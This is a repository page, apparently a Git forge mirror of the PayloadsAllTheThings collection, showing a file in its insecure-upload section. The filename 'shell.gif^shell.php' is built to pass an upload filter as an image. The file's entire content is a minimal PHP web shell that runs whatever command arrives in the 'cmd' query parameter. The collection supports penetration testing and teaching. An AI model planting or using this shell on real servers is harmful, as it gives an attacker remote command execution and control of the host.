This website requires JavaScript.
Explore
Help
Sign In
ch0ic3
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2025-02-01 07:57:25 +00:00
Code
Issues
Actions
Packages
Projects
Releases
Wiki
Activity
462b6684d1
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.gif^shell.php
Swk
462b6684d1
Deployed
fb349a5
with MkDocs version: 1.6.1
2025-01-25 10:50:38 +00:00
2 lines
44 B
PHP
Raw
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink